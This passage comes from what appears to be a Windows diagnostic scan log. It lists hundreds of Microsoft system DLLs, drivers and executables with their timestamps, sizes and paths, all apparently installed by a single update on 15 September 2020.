2020-09-15 17:43 - 2020-09-15 17:43 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AssignedAccessRuntime.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfproc.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000045056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfdisk.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000042496 _____ (Microsoft Corporation) C:\WINDOWS\system32\upnpcont.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000042496 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfos.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000042320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryCore.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\afunix.sys
2020-09-15 17:43 - 2020-09-15 17:43 - 000041472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\perfctrs.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000039424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\perfproc.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\perfdisk.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000037376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsmprovhost.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000036864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wups.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000036864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\perfos.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000035840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManHTTPConfig.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000034304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000033792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WordBreakers.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000033792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfdprov.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000030208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cmintegrator.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Drivers\afunix.sys
2020-09-15 17:43 - 2020-09-15 17:43 - 000028160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PCShellCommonProxyStub.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfnet.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmAgent.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\perfnet.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msacm32.drv
2020-09-15 17:43 - 2020-09-15 17:43 - 000021312 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdhvcom.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appidtel.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\defragproxy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000018944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\midimap.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000016384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanhlp.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d8thk.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d8thk.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsmplpxy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dciman32.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMAlertListener.ProxyStub.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000009277 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2020-09-15 17:43 - 2020-09-15 17:43 - 000007680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DMAlertListener.ProxyStub.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000007168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimg32.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000004096 _____ (Microsoft Corporation) C:\WINDOWS\system32\defragres.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\lpk.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 010847552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 010336896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 009034752 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 008006248 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 007979416 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 006197760 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 005870496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 005729280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AI.MachineLearning.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 004727296 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 003875840 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 003815424 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 003806720 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 003779384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 003749376 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeContent.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 003587584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 003505952 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 003384832 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 003303936 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 003181056 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 003082240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 003062784 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002991416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 002975744 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002951680 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 002918736 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002851128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 002772992 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmSvc.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002631168 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002587448 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002451456 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002422784 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallService.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002319216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002259968 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002248192 _____ (Microsoft Corporation) C:\WINDOWS\system32\ISM.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002178048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002131032 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002023704 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001978656 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcomp.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001866240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001856312 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001825280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001805192 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2020-09-15 17:42 - 2020-09-15 17:42 - 001777152 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001765888 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001701368 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001700352 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowManagement.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001649664 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001538656 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 001530880 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001504768 _____ (Microsoft Corporation) C:\WINDOWS\system32\MoUsoCoreWorker.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 001498624 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001492480 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001488384 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgr.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001473024 _____ (Microsoft Corporation) C:\WINDOWS\system32\qmgr.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001472824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 001426944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Vpn.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001414144 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocoreworker.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 001400208 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001393480 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2020-09-15 17:42 - 2020-09-15 17:42 - 001378568 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputHost.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001337176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryPS.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001329664 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001261056 _____ (Microsoft Corporation) C:\WINDOWS\system32\directml.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001209344 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001209096 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplyTrustOffline.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 001198288 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 001191592 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001145344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001126488 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001105408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001104384 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001094472 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001092392 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001089344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ClipSp.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 001070080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001059328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001046528 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\IKEEXT.DLL
2020-09-15 17:42 - 2020-09-15 17:42 - 001044880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001028288 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001027344 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001009664 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001008696 _____ (Microsoft Corporation) C:\WINDOWS\system32\propsys.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000999744 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000978760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000976680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000971264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.OnlineId.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000935936 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000913776 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000908800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000903992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000887296 _____ (Microsoft Corporation) C:\WINDOWS\system32\BFE.DLL
2020-09-15 17:42 - 2020-09-15 17:42 - 000864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000843376 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000827912 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000799544 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.applicationmodel.datatransfer.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000795136 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000755200 _____ (Microsoft Corporation) C:\WINDOWS\system32\WlanMediaManager.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000753152 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.immersiveshell.serviceprovider.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000725608 _____ (Microsoft Corporation) C:\WINDOWS\system32\StateRepository.Core.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000707016 _____ C:\WINDOWS\system32\TextShaping.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000705560 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000705024 _____ (Microsoft Corporation) C:\WINDOWS\system32\SHCore.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000677888 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000674304 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplicationFrame.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000651264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnprv.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000647480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\afd.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000639928 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000635824 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000634240 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcp_win.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000614912 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000603464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000596992 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000586752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Payments.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000583168 _____ (Microsoft Corporation) C:\WINDOWS\system32\FirewallAPI.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000573752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000566784 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000566272 _____ (Microsoft Corporation) C:\WINDOWS\system32\usosvc.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000559616 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000531448 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64win.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000507904 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000502592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2020-09-15 17:42 - 2020-09-15 17:42 - 000500224 _____ (Microsoft Corporation) C:\WINDOWS\system32\FWPUCLNT.DLL
2020-09-15 17:42 - 2020-09-15 17:42 - 000491520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cldflt.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000489984 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000488960 _____ (Microsoft Corporation) C:\WINDOWS\system32\das.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000485888 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000477496 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000455480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000454960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000436736 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincorlib.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Lights.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000418816 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000403768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000401408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Search.ProtocolHandler.MAPI2.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000399872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcore.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000395264 _____ (Microsoft Corporation) C:\WINDOWS\system32\licensingdiag.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000390144 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppLockerCSP.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000382464 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovs.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000381952 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssvp.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000380728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msrpc.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000378368 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationControllerPS.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000374072 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000373560 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthAgent.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000367616 _____ (Microsoft Corporation) C:\WINDOWS\system32\QuickActionsDataModel.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsrslvr.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000332288 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000322560 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmWmiPl.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000322376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msquic.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000321536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000321024 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateDeploymentProvider.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000309248 _____ (Microsoft Corporation) C:\WINDOWS\system32\smbwmiv2.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000306176 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcore6.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000294912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\directxdatabaseupdater.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000272384 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchFilterHost.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000269624 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryUpgrade.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000266240 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000265728 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000260920 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000260608 _____ (Microsoft Corporation) C:\WINDOWS\system32\DesktopSwitcherDataModel.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000259888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000249664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000242176 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwpolicyiomgr.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000235520 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgiadaptercache.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000231424 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallServiceTasks.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000230392 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000230376 _____ (Microsoft Corporation) C:\WINDOWS\system32\IPHLPAPI.DLL
2020-09-15 17:42 - 2020-09-15 17:42 - 000228864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.CapturePicker.Desktop.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000219648 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfo.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000214016 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssph.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000209920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Win32CompatibilityAppraiserCSP.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000209920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000208696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000200704 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
